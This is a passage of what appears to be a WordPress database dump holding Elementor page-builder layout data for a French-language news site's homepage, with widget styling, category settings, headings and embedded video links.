",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"p72uffi\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"4\",\"orderby\":\"name\",\"loop_infinite_class\":\"loop-infinte-list-2\",\"width\":\"700\",\"height\":\"500\",\"title_font_size\":{\"unit\":\"px\",\"size\":19},\"use_meta\":\"\",\"use_excerpt\":\"\",\"use_button\":\"\",\"content_half_mobile\":{\"unit\":\"px\",\"size\":270},\"content_half_2_mobile\":{\"unit\":\"px\",\"size\":300}},\"elements\":[],\"widgetType\":\"magzma-post-list-2\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Guin\\u00e9e innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false}]'),(1479,503,'_elementor_version','0.4'),(1480,503,'_elementor_css','a:3:{s:4:\"time\";i:1508924649;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(1482,504,'_elementor_edit_mode','builder'),(1483,504,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"p72uffi\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"4\",\"orderby\":\"name\",\"loop_infinite_class\":\"loop-infinte-list-2\",\"width\":\"700\",\"height\":\"500\",\"title_font_size\":{\"unit\":\"px\",\"size\":19},\"use_meta\":\"\",\"use_excerpt\":\"\",\"use_button\":\"\",\"content_half_mobile\":{\"unit\":\"px\",\"size\":270},\"content_half_2_mobile\":{\"unit\":\"px\",\"size\":300}},\"elements\":[],\"widgetType\":\"magzma-post-list-2\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos 